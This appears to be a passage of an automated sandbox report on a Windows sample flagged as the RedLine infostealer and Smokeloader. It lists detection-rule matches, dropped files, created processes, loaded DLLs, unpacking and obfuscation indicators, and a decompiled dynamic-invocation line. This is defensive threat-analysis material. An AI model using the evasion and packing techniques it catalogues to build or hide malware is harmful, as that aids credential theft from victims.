Source: 0.2.FE30749E0A05991421373D09B35D63F1E267C8B1DE97850E9AAB4433834049A6.exe.3605570.8.raw.unpack, type: UNPACKEDPE	Matched rule: MALWARE_Win_RedLine snort2_sid = 920072-920073, author = ditekSHen, description = Detects RedLine infostealer, clamav_sig = MALWARE.Win.Trojan.RedLine-1, MALWARE.Win.Trojan.RedLine-2, snort3_sid = 920072-920073
Source: 0.2.FE30749E0A05991421373D09B35D63F1E267C8B1DE97850E9AAB4433834049A6.exe.3606458.7.raw.unpack, type: UNPACKEDPE	Matched rule: MALWARE_Win_RedLine snort2_sid = 920072-920073, author = ditekSHen, description = Detects RedLine infostealer, clamav_sig = MALWARE.Win.Trojan.RedLine-1, MALWARE.Win.Trojan.RedLine-2, snort3_sid = 920072-920073
Source: 00000000.00000002.3271943549.0000000000400000.00000040.00000001.01000000.00000003.sdmp, type: MEMORY	Matched rule: MALWARE_Win_RedLine snort2_sid = 920072-920073, author = ditekSHen, description = Detects RedLine infostealer, clamav_sig = MALWARE.Win.Trojan.RedLine-1, MALWARE.Win.Trojan.RedLine-2, snort3_sid = 920072-920073
Source: 00000000.00000003.2035728193.0000000002110000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY	Matched rule: MALWARE_Win_RedLine snort2_sid = 920072-920073, author = ditekSHen, description = Detects RedLine infostealer, clamav_sig = MALWARE.Win.Trojan.RedLine-1, MALWARE.Win.Trojan.RedLine-2, snort3_sid = 920072-920073
Source: 00000000.00000002.3273309685.000000000068E000.00000040.00000020.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_RedLineStealer_ed346e4c reference_sample = a91c1d3965f11509d1c1125210166b824a79650f29ea203983fffb5f8900858c, os = windows, severity = x86, creation_date = 2022-02-17, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.RedLineStealer, fingerprint = 834c13b2e0497787e552bb1318664496d286e7cf57b4661e5e07bf1cffe61b82, id = ed346e4c-7890-41ee-8648-f512682fe20e, last_modified = 2022-04-12
Source: 00000000.00000002.3277082749.0000000005370000.00000004.08000000.00040000.00000000.sdmp, type: MEMORY	Matched rule: MALWARE_Win_RedLine snort2_sid = 920072-920073, author = ditekSHen, description = Detects RedLine infostealer, clamav_sig = MALWARE.Win.Trojan.RedLine-1, MALWARE.Win.Trojan.RedLine-2, snort3_sid = 920072-920073
Source: 00000000.00000002.3272849307.0000000000610000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Smokeloader_3687686f reference_sample = 8b3014ecd962a335b246f6c70fc820247e8bdaef98136e464b1fdb824031eef7, os = windows, severity = x86, creation_date = 2021-07-21, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Smokeloader, fingerprint = 0f483f9f79ae29b944825c1987366d7b450312f475845e2242a07674580918bc, id = 3687686f-8fbf-4f09-9afa-612ee65dc86c, last_modified = 2021-08-23
Source: 00000000.00000002.3275191673.00000000024A0000.00000004.08000000.00040000.00000000.sdmp, type: MEMORY	Matched rule: MALWARE_Win_RedLine snort2_sid = 920072-920073, author = ditekSHen, description = Detects RedLine infostealer, clamav_sig = MALWARE.Win.Trojan.RedLine-1, MALWARE.Win.Trojan.RedLine-2, snort3_sid = 920072-920073

Source: IoUNtL.exe.0.dr

Static PE information: Section: .reloc IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE

Source: IoUNtL.exe.0.dr

Static PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE

Source: IoUNtL.exe.0.dr

Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_RESERVED size: 0x100000 address: 0x0

Source: 0.2.FE30749E0A05991421373D09B35D63F1E267C8B1DE97850E9AAB4433834049A6.exe.5370000.9.raw.unpack, z2jc63fLkugS1X8Q9N.cs	Cryptographic APIs: 'CreateDecryptor'
Source: 0.2.FE30749E0A05991421373D09B35D63F1E267C8B1DE97850E9AAB4433834049A6.exe.5370000.9.raw.unpack, z2jc63fLkugS1X8Q9N.cs	Cryptographic APIs: 'CreateDecryptor'
Source: 0.2.FE30749E0A05991421373D09B35D63F1E267C8B1DE97850E9AAB4433834049A6.exe.5370000.9.raw.unpack, z2jc63fLkugS1X8Q9N.cs	Cryptographic APIs: 'CreateDecryptor'
Source: 0.2.FE30749E0A05991421373D09B35D63F1E267C8B1DE97850E9AAB4433834049A6.exe.362f590.6.raw.unpack, z2jc63fLkugS1X8Q9N.cs	Cryptographic APIs: 'CreateDecryptor'
Source: 0.2.FE30749E0A05991421373D09B35D63F1E267C8B1DE97850E9AAB4433834049A6.exe.362f590.6.raw.unpack, z2jc63fLkugS1X8Q9N.cs	Cryptographic APIs: 'CreateDecryptor'
Source: 0.2.FE30749E0A05991421373D09B35D63F1E267C8B1DE97850E9AAB4433834049A6.exe.362f590.6.raw.unpack, z2jc63fLkugS1X8Q9N.cs	Cryptographic APIs: 'CreateDecryptor'
Source: 0.2.FE30749E0A05991421373D09B35D63F1E267C8B1DE97850E9AAB4433834049A6.exe.24a0ee8.4.raw.unpack, z2jc63fLkugS1X8Q9N.cs	Cryptographic APIs: 'CreateDecryptor'
Source: 0.2.FE30749E0A05991421373D09B35D63F1E267C8B1DE97850E9AAB4433834049A6.exe.24a0ee8.4.raw.unpack, z2jc63fLkugS1X8Q9N.cs	Cryptographic APIs: 'CreateDecryptor'
Source: 0.2.FE30749E0A05991421373D09B35D63F1E267C8B1DE97850E9AAB4433834049A6.exe.24a0ee8.4.raw.unpack, z2jc63fLkugS1X8Q9N.cs	Cryptographic APIs: 'CreateDecryptor'
Source: 0.2.FE30749E0A05991421373D09B35D63F1E267C8B1DE97850E9AAB4433834049A6.exe.3606458.7.raw.unpack, z2jc63fLkugS1X8Q9N.cs	Cryptographic APIs: 'CreateDecryptor'
Source: 0.2.FE30749E0A05991421373D09B35D63F1E267C8B1DE97850E9AAB4433834049A6.exe.3606458.7.raw.unpack, z2jc63fLkugS1X8Q9N.cs	Cryptographic APIs: 'CreateDecryptor'
Source: 0.2.FE30749E0A05991421373D09B35D63F1E267C8B1DE97850E9AAB4433834049A6.exe.3606458.7.raw.unpack, z2jc63fLkugS1X8Q9N.cs	Cryptographic APIs: 'CreateDecryptor'

Source: classification engine

Classification label: mal100.spre.troj.evad.winEXE@5/11@1/2

Source: C:\Users\user\AppData\Local\Temp\IoUNtL.exe

Code function: 1_2_00F4119F GetCurrentProcess,OpenProcessToken,AdjustTokenPrivileges,CloseHandle,CloseHandle,

1_2_00F4119F

Source: C:\Users\user\Desktop\FE30749E0A05991421373D09B35D63F1E267C8B1DE97850E9AAB4433834049A6.exe

0_2_004019F0

Source: C:\Users\user\Desktop\FE30749E0A05991421373D09B35D63F1E267C8B1DE97850E9AAB4433834049A6.exe

0_2_004019F0

Source: C:\Users\user\AppData\Local\Temp\IoUNtL.exe

File created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\T9RRWRNL\k1[1].rar

Jump to behavior

Source: C:\Users\user\Desktop\FE30749E0A05991421373D09B35D63F1E267C8B1DE97850E9AAB4433834049A6.exe	Mutant created: NULL
Source: C:\Windows\SysWOW64\WerFault.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\WERReportingForProcess2920

Source: C:\Users\user\Desktop\FE30749E0A05991421373D09B35D63F1E267C8B1DE97850E9AAB4433834049A6.exe

File created: C:\Users\user\AppData\Local\Temp\IoUNtL.exe

Jump to behavior

Source: C:\Users\user\Desktop\FE30749E0A05991421373D09B35D63F1E267C8B1DE97850E9AAB4433834049A6.exe

Command line argument: 08A

0_2_00413780

Source: C:\Users\user\Desktop\FE30749E0A05991421373D09B35D63F1E267C8B1DE97850E9AAB4433834049A6.exe

Key opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers

Jump to behavior

Source: unknown	Process created: C:\Users\user\Desktop\FE30749E0A05991421373D09B35D63F1E267C8B1DE97850E9AAB4433834049A6.exe "C:\Users\user\Desktop\FE30749E0A05991421373D09B35D63F1E267C8B1DE97850E9AAB4433834049A6.exe"
Source: C:\Users\user\Desktop\FE30749E0A05991421373D09B35D63F1E267C8B1DE97850E9AAB4433834049A6.exe	Process created: C:\Users\user\AppData\Local\Temp\IoUNtL.exe C:\Users\user\AppData\Local\Temp\IoUNtL.exe
Source: C:\Users\user\AppData\Local\Temp\IoUNtL.exe	Process created: C:\Windows\SysWOW64\WerFault.exe C:\Windows\SysWOW64\WerFault.exe -u -p 2920 -s 1556
Source: C:\Users\user\Desktop\FE30749E0A05991421373D09B35D63F1E267C8B1DE97850E9AAB4433834049A6.exe	Process created: C:\Users\user\AppData\Local\Temp\IoUNtL.exe C:\Users\user\AppData\Local\Temp\IoUNtL.exe	Jump to behavior

Source: C:\Users\user\Desktop\FE30749E0A05991421373D09B35D63F1E267C8B1DE97850E9AAB4433834049A6.exe	Section loaded: apphelp.dll	Jump to behavior
Source: C:\Users\user\Desktop\FE30749E0A05991421373D09B35D63F1E267C8B1DE97850E9AAB4433834049A6.exe	Section loaded: msimg32.dll	Jump to behavior
Source: C:\Users\user\Desktop\FE30749E0A05991421373D09B35D63F1E267C8B1DE97850E9AAB4433834049A6.exe	Section loaded: msvcr100.dll	Jump to behavior
Source: C:\Users\user\Desktop\FE30749E0A05991421373D09B35D63F1E267C8B1DE97850E9AAB4433834049A6.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Users\user\Desktop\FE30749E0A05991421373D09B35D63F1E267C8B1DE97850E9AAB4433834049A6.exe	Section loaded: uxtheme.dll	Jump to behavior
Source: C:\Users\user\Desktop\FE30749E0A05991421373D09B35D63F1E267C8B1DE97850E9AAB4433834049A6.exe	Section loaded: mscoree.dll	Jump to behavior
Source: C:\Users\user\Desktop\FE30749E0A05991421373D09B35D63F1E267C8B1DE97850E9AAB4433834049A6.exe	Section loaded: vcruntime140_clr0400.dll	Jump to behavior
Source: C:\Users\user\Desktop\FE30749E0A05991421373D09B35D63F1E267C8B1DE97850E9AAB4433834049A6.exe	Section loaded: ucrtbase_clr0400.dll	Jump to behavior
Source: C:\Users\user\Desktop\FE30749E0A05991421373D09B35D63F1E267C8B1DE97850E9AAB4433834049A6.exe	Section loaded: ucrtbase_clr0400.dll	Jump to behavior
Source: C:\Users\user\Desktop\FE30749E0A05991421373D09B35D63F1E267C8B1DE97850E9AAB4433834049A6.exe	Section loaded: wldp.dll	Jump to behavior
Source: C:\Users\user\Desktop\FE30749E0A05991421373D09B35D63F1E267C8B1DE97850E9AAB4433834049A6.exe	Section loaded: amsi.dll	Jump to behavior
Source: C:\Users\user\Desktop\FE30749E0A05991421373D09B35D63F1E267C8B1DE97850E9AAB4433834049A6.exe	Section loaded: userenv.dll	Jump to behavior
Source: C:\Users\user\Desktop\FE30749E0A05991421373D09B35D63F1E267C8B1DE97850E9AAB4433834049A6.exe	Section loaded: profapi.dll	Jump to behavior
Source: C:\Users\user\Desktop\FE30749E0A05991421373D09B35D63F1E267C8B1DE97850E9AAB4433834049A6.exe	Section loaded: version.dll	Jump to behavior
Source: C:\Users\user\Desktop\FE30749E0A05991421373D09B35D63F1E267C8B1DE97850E9AAB4433834049A6.exe	Section loaded: msasn1.dll	Jump to behavior
Source: C:\Users\user\Desktop\FE30749E0A05991421373D09B35D63F1E267C8B1DE97850E9AAB4433834049A6.exe	Section loaded: gpapi.dll	Jump to behavior
Source: C:\Users\user\Desktop\FE30749E0A05991421373D09B35D63F1E267C8B1DE97850E9AAB4433834049A6.exe	Section loaded: cryptsp.dll	Jump to behavior
Source: C:\Users\user\Desktop\FE30749E0A05991421373D09B35D63F1E267C8B1DE97850E9AAB4433834049A6.exe	Section loaded: rsaenh.dll	Jump to behavior
Source: C:\Users\user\Desktop\FE30749E0A05991421373D09B35D63F1E267C8B1DE97850E9AAB4433834049A6.exe	Section loaded: cryptbase.dll	Jump to behavior
Source: C:\Users\user\Desktop\FE30749E0A05991421373D09B35D63F1E267C8B1DE97850E9AAB4433834049A6.exe	Section loaded: dwrite.dll	Jump to behavior
Source: C:\Users\user\Desktop\FE30749E0A05991421373D09B35D63F1E267C8B1DE97850E9AAB4433834049A6.exe	Section loaded: msvcp140_clr0400.dll	Jump to behavior
Source: C:\Users\user\Desktop\FE30749E0A05991421373D09B35D63F1E267C8B1DE97850E9AAB4433834049A6.exe	Section loaded: windows.storage.dll	Jump to behavior
Source: C:\Users\user\Desktop\FE30749E0A05991421373D09B35D63F1E267C8B1DE97850E9AAB4433834049A6.exe	Section loaded: mswsock.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\IoUNtL.exe	Section loaded: apphelp.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\IoUNtL.exe	Section loaded: urlmon.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\IoUNtL.exe	Section loaded: iertutil.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\IoUNtL.exe	Section loaded: srvcli.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\IoUNtL.exe	Section loaded: netutils.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\IoUNtL.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\IoUNtL.exe	Section loaded: uxtheme.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\IoUNtL.exe	Section loaded: wininet.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\IoUNtL.exe	Section loaded: sspicli.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\IoUNtL.exe	Section loaded: windows.storage.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\IoUNtL.exe	Section loaded: wldp.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\IoUNtL.exe	Section loaded: profapi.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\IoUNtL.exe	Section loaded: ondemandconnroutehelper.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\IoUNtL.exe	Section loaded: winhttp.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\IoUNtL.exe	Section loaded: mswsock.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\IoUNtL.exe	Section loaded: iphlpapi.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\IoUNtL.exe	Section loaded: winnsi.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\IoUNtL.exe	Section loaded: dnsapi.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\IoUNtL.exe	Section loaded: rasadhlp.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\IoUNtL.exe	Section loaded: fwpuclnt.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\IoUNtL.exe	Section loaded: ntvdm64.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\IoUNtL.exe	Section loaded: version.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\IoUNtL.exe	Section loaded: textshaping.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\IoUNtL.exe	Section loaded: textinputframework.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\IoUNtL.exe	Section loaded: coreuicomponents.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\IoUNtL.exe	Section loaded: coremessaging.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\IoUNtL.exe	Section loaded: ntmarta.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\IoUNtL.exe	Section loaded: coremessaging.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\IoUNtL.exe	Section loaded: wintypes.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\IoUNtL.exe	Section loaded: wintypes.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\IoUNtL.exe	Section loaded: wintypes.dll	Jump to behavior

Source: C:\Users\user\Desktop\FE30749E0A05991421373D09B35D63F1E267C8B1DE97850E9AAB4433834049A6.exe

Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{0EE7644B-1BAD-48B1-9889-0281C206EB85}\InprocServer32

Jump to behavior

Source: C:\Users\user\Desktop\FE30749E0A05991421373D09B35D63F1E267C8B1DE97850E9AAB4433834049A6.exe

File opened: C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorrc.dll

Jump to behavior

Source: C:\Users\user\Desktop\FE30749E0A05991421373D09B35D63F1E267C8B1DE97850E9AAB4433834049A6.exe

File opened: C:\Windows\SysWOW64\msvcr100.dll

Jump to behavior

Source: FE30749E0A05991421373D09B35D63F1E267C8B1DE97850E9AAB4433834049A6.exe

Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_DEBUG

Source:	Binary string: C:\Windows\System.ServiceModel.pdbpdbdel.pdb source: FE30749E0A05991421373D09B35D63F1E267C8B1DE97850E9AAB4433834049A6.exe, 00000000.00000002.3276908752.0000000004CE9000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: \??\C:\Windows\dll\System.ServiceModel.pdb source: FE30749E0A05991421373D09B35D63F1E267C8B1DE97850E9AAB4433834049A6.exe, 00000000.00000002.3273371732.00000000006FE000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: \??\C:\Windows\Microsoft.Net\assembly\GAC_MSIL\System.ServiceModel\v4.0_4.0.0.0__b77a5c561934e089\System.ServiceModel.pdb< source: FE30749E0A05991421373D09B35D63F1E267C8B1DE97850E9AAB4433834049A6.exe, 00000000.00000002.3276908752.0000000004CC0000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: System.ServiceModel.pdb693405117-2476756634-1003_Classes\WOW6432Node\CLSID\{0A29FF9E-7F9C-4437-8B11-F424491E3931}\InprocServer32^ source: FE30749E0A05991421373D09B35D63F1E267C8B1DE97850E9AAB4433834049A6.exe, 00000000.00000002.3276908752.0000000004CE9000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: _.pdb source: FE30749E0A05991421373D09B35D63F1E267C8B1DE97850E9AAB4433834049A6.exe, 00000000.00000003.2038029261.00000000006F5000.00000004.00000020.00020000.00000000.sdmp, FE30749E0A05991421373D09B35D63F1E267C8B1DE97850E9AAB4433834049A6.exe, 00000000.00000002.3275112639.0000000002313000.00000004.00000020.00020000.00000000.sdmp, FE30749E0A05991421373D09B35D63F1E267C8B1DE97850E9AAB4433834049A6.exe, 00000000.00000002.3275191673.00000000024A0000.00000004.08000000.00040000.00000000.sdmp, FE30749E0A05991421373D09B35D63F1E267C8B1DE97850E9AAB4433834049A6.exe, 00000000.00000002.3276574886.0000000003605000.00000004.00000800.00020000.00000000.sdmp
Source:	Binary string: C:\yolarogi62\xemojecu_butupibojeyet\wefiwuroxiv\xuruka.pdb source: FE30749E0A05991421373D09B35D63F1E267C8B1DE97850E9AAB4433834049A6.exe
Source:	Binary string: C:\Data\svn\autoit\branch_3.3.16\bin\SciTE\SciTE.pdb source: SciTE.exe.1.dr
Source:	Binary string: `C:\yolarogi62\xemojecu_butupibojeyet\wefiwuroxiv\xuruka.pdb source: FE30749E0A05991421373D09B35D63F1E267C8B1DE97850E9AAB4433834049A6.exe
Source:	Binary string: System.ServiceModel.pdb source: FE30749E0A05991421373D09B35D63F1E267C8B1DE97850E9AAB4433834049A6.exe, 00000000.00000002.3276908752.0000000004D38000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: \??\C:\Windows\Microsoft.Net\assembly\GAC_MSIL\System.ServiceModel\v4.0_4.0.0.0__b77a5c561934e089\System.ServiceModel.pdb source: FE30749E0A05991421373D09B35D63F1E267C8B1DE97850E9AAB4433834049A6.exe, 00000000.00000002.3276908752.0000000004CC0000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: \??\C:\Windows\symbols\dll\System.ServiceModel.pdbW.: source: FE30749E0A05991421373D09B35D63F1E267C8B1DE97850E9AAB4433834049A6.exe, 00000000.00000002.3273371732.0000000000732000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: \??\C:\Windows\symbols\dll\System.ServiceModel.pdb source: FE30749E0A05991421373D09B35D63F1E267C8B1DE97850E9AAB4433834049A6.exe, 00000000.00000002.3273371732.0000000000732000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: \??\C:\Windows\System.ServiceModel.pdbu source: FE30749E0A05991421373D09B35D63F1E267C8B1DE97850E9AAB4433834049A6.exe, 00000000.00000002.3273371732.0000000000732000.00000004.00000020.00020000.00000000.sdmp

Data Obfuscation

Detected unpacking (changes PE section rights)

Source: C:\Users\user\Desktop\FE30749E0A05991421373D09B35D63F1E267C8B1DE97850E9AAB4433834049A6.exe	Unpacked PE file: 0.2.FE30749E0A05991421373D09B35D63F1E267C8B1DE97850E9AAB4433834049A6.exe.400000.0.unpack .text:ER;.data:W;.rsrc:R;u:EW; vs .text:ER;.rdata:R;.data:W;.rsrc:R;
Source: C:\Users\user\AppData\Local\Temp\IoUNtL.exe	Unpacked PE file: 1.2.IoUNtL.exe.f40000.1.unpack .text:EW;.rdata:W;.data:W;.reloc:W;.aspack:EW;.adata:EW; vs .text:ER;.rdata:R;.data:W;.reloc:R;.aspack:EW;.adata:EW;

Detected unpacking (overwrites its own PE header)

Source: C:\Users\user\Desktop\FE30749E0A05991421373D09B35D63F1E267C8B1DE97850E9AAB4433834049A6.exe

Unpacked PE file: 0.2.FE30749E0A05991421373D09B35D63F1E267C8B1DE97850E9AAB4433834049A6.exe.400000.0.unpack

.NET source code contains method to dynamically call methods (often used by packers)

Source: 0.2.FE30749E0A05991421373D09B35D63F1E267C8B1DE97850E9AAB4433834049A6.exe.5370000.9.raw.unpack, z2jc63fLkugS1X8Q9N.cs	.Net Code: typeof(Marshal).GetMethod("GetDelegateForFunctionPointer", new Type[2]{typeof(IntPtr),typeof(Type)})
Source: 0.2.FE30749E0A05991421373D09B35D63F1E267C8B1DE97850E9AAB4433834049A6.exe.362f590.6.raw.unpack, z2jc63fLkugS1X8Q9N.cs	.Net Code: typeof(Marshal).GetMethod("GetDelegateForFunctionPointer", new Type[2]{typeof(IntPtr),typeof(Type)})
Source: 0.2.FE30749E0A05991421373D09B35D63F1E267C8B1DE97850E9AAB4433834049A6.exe.24a0ee8.4.raw.unpack, z2jc63fLkugS1X8Q9N.cs	.Net Code: typeof(Marshal).GetMethod("GetDelegateForFunctionPointer", new Type[2]{typeof(IntPtr),typeof(Type)})
Source: 0.2.FE30749E0A05991421373D09B35D63F1E267C8B1DE97850E9AAB4433834049A6.exe.3606458.7.raw.unpack, z2jc63fLkugS1X8Q9N.cs	.Net Code: typeof(Marshal).GetMethod("GetDelegateForFunctionPointer", new Type[2]{typeof(IntPtr),typeof(Type)})
Source: 0.2.FE30749E0A05991421373D09B35D63F1E267C8B1DE97850E9AAB4433834049A6.exe.2354aa6.2.raw.unpack, z2jc63fLkugS1X8Q9N.cs	.Net Code: typeof(Marshal).GetMethod("GetDelegateForFunctionPointer", new Type[2]{typeof(IntPtr),typeof(Type)})
Source: 0.3.FE30749E0A05991421373D09B35D63F1E267C8B1DE97850E9AAB4433834049A6.exe.6f54f8.1.raw.unpack, z2jc63fLkugS1X8Q9N.cs	.Net Code: typeof(Marshal).GetMethod("GetDelegateForFunctionPointer", new Type[2]{typeof(IntPtr),typeof(Type)})

Contains functionality to dynamically determine API calls

Source: C:\Users\user\Desktop\FE30749E0A05991421373D09B35D63F1E267C8B1DE97850E9AAB4433834049A6.exe

0_2_004019F0

Entry point lies outside standard sections

Source: initial sample

Static PE information: section where entry point is pointing to: u

PE file contains sections with non-standard names

Source: FE30749E0A05991421373D09B35D63F1E267C8B1DE97850E9AAB4433834049A6.exe	Static PE information: section name: u
Source: IoUNtL.exe.0.dr	Static PE information: section name: .aspack
Source: IoUNtL.exe.0.dr	Static PE information: section name: .adata
Source: Uninstall.exe.1.dr	Static PE information: section name: EpNuZ
Source: MyProg.exe.1.dr	Static PE information: section name: PELIB
Source: MyProg.exe.1.dr	Static PE information: section name: Y\|uR
Source: SciTE.exe.1.dr	Static PE information: section name: u

Uses code obfuscation techniques (call, push, ret)

Source: C:\Users\user\Desktop\FE30749E0A05991421373D09B35D63F1E267C8B1DE97850E9AAB4433834049A6.exe	Code function: 0_2_0041C40C push cs; iretd	0_2_0041C4E2
Source: C:\Users\user\Desktop\FE30749E0A05991421373D09B35D63F1E267C8B1DE97850E9AAB4433834049A6.exe	Code function: 0_2_00423149 push eax; ret	0_2_00423179
Source: C:\Users\user\Desktop\FE30749E0A05991421373D09B35D63F1E267C8B1DE97850E9AAB4433834049A6.exe	Code function: 0_2_0041C50E push cs; iretd	0_2_0041C4E2
Source: C:\Users\user\Desktop\FE30749E0A05991421373D09B35D63F1E267C8B1DE97850E9AAB4433834049A6.exe	Code function: 0_2_004231C8 push eax; ret	0_2_00423179
Source: C:\Users\user\Desktop\FE30749E0A05991421373D09B35D63F1E267C8B1DE97850E9AAB4433834049A6.exe	Code function: 0_2_0040E21D push ecx; ret	0_2_0040E230
Source: C:\Users\user\Desktop\FE30749E0A05991421373D09B35D63F1E267C8B1DE97850E9AAB4433834049A6.exe	Code function: 0_2_0041C6BE push ebx; ret	0_2_0041C6BF
Source: C:\Users\user\Desktop\FE30749E0A05991421373D09B35D63F1E267C8B1DE97850E9AAB4433834049A6.exe	Code function: 0_2_0062C10E push ebx; ret	0_2_0062C10F
Source: C:\Users\user\Desktop\FE30749E0A05991421373D09B35D63F1E267C8B1DE97850E9AAB4433834049A6.exe	Code function: 0_2_0061E46D push ecx; ret	0_2_0061E480
Source: C:\Users\user\Desktop\FE30749E0A05991421373D09B35D63F1E267C8B1DE97850E9AAB4433834049A6.exe	Code function: 0_2_0062BE5C push cs; iretd	0_2_0062BF32
Source: C:\Users\user\Desktop\FE30749E0A05991421373D09B35D63F1E267C8B1DE97850E9AAB4433834049A6.exe	Code function: 0_2_0062BF5E push cs; iretd	0_2_0062BF32
Source: C:\Users\user\Desktop\FE30749E0A05991421373D09B35D63F1E267C8B1DE97850E9AAB4433834049A6.exe	Code function: 0_2_006938C5 push ecx; iretd	0_2_006938C8
Source: C:\Users\user\Desktop\FE30749E0A05991421373D09B35D63F1E267C8B1DE97850E9AAB4433834049A6.exe	Code function: 0_2_00690A87 push FFFFFFE1h; ret	0_2_00690A96
Source: C:\Users\user\Desktop\FE30749E0A05991421373D09B35D63F1E267C8B1DE97850E9AAB4433834049A6.exe	Code function: 0_2_006939D2 push edi; retf	0_2_006939D3
Source: C:\Users\user\Desktop\FE30749E0A05991421373D09B35D63F1E267C8B1DE97850E9AAB4433834049A6.exe	Code function: 0_2_021D62D0 push ds; iretd	0_2_021D62DF
Source: C:\Users\user\Desktop\FE30749E0A05991421373D09B35D63F1E267C8B1DE97850E9AAB4433834049A6.exe	Code function: 0_2_021D52CC push es; iretd	0_2_021D52CF
Source: C:\Users\user\Desktop\FE30749E0A05991421373D09B35D63F1E267C8B1DE97850E9AAB4433834049A6.exe	Code function: 0_2_060644A0 pushfd ; iretd	0_2_06064789
Source: C:\Users\user\Desktop\FE30749E0A05991421373D09B35D63F1E267C8B1DE97850E9AAB4433834049A6.exe	Code function: 0_2_06064852 push es; ret	0_2_06064860
Source: C:\Users\user\Desktop\FE30749E0A05991421373D09B35D63F1E267C8B1DE97850E9AAB4433834049A6.exe	Code function: 0_2_060657D0 push 0C0603D8h; retf	0_2_0606582D
Source: C:\Users\user\Desktop\FE30749E0A05991421373D09B35D63F1E267C8B1DE97850E9AAB4433834049A6.exe	Code function: 0_2_060A78B0 push es; ret	0_2_060A78C0
Source: C:\Users\user\AppData\Local\Temp\IoUNtL.exe	Code function: 1_2_00F46076 push 00F414E1h; ret	1_2_00F46425
Source: C:\Users\user\AppData\Local\Temp\IoUNtL.exe	Code function: 1_2_00F41638 push dword ptr [00F43084h]; ret	1_2_00F4170E
Source: C:\Users\user\AppData\Local\Temp\IoUNtL.exe	Code function: 1_2_00F42D9B push ecx; ret	1_2_00F42DAB
Source: C:\Users\user\AppData\Local\Temp\IoUNtL.exe	Code function: 1_2_00F4600A push ebp; ret	1_2_00F4600D

Source: FE30749E0A05991421373D09B35D63F1E267C8B1DE97850E9AAB4433834049A6.exe	Static PE information: section name: u entropy: 6.934487792037011
Source: IoUNtL.exe.0.dr	Static PE information: section name: .text entropy: 7.81169422100848
Source: Uninstall.exe.1.dr	Static PE information: section name: EpNuZ entropy: 6.935083153445225
Source: MyProg.exe.1.dr	Static PE information: section name: Y\|uR entropy: 6.934720431366084
Source: SciTE.exe.1.dr	Static PE information: section name: u entropy: 6.933665407742621

Source: 0.2.FE30749E0A05991421373D09B35D63F1E267C8B1DE97850E9AAB4433834049A6.exe.5370000.9.raw.unpack, z2jc63fLkugS1X8Q9N.cs	High entropy of concatenated method names: 'u4iI94Dy8g', 'm9OIO8Q0EK', 'z47It19xek', 'NQ1IZyT0jI', 'wgZIumIPsF', 'V26I7M2UXj', 'V8w_000D_000A_00946_0095_008C_008C_009A', 'HImHehMQs', 'OdTftVXgR', 'fBSIsFavs'
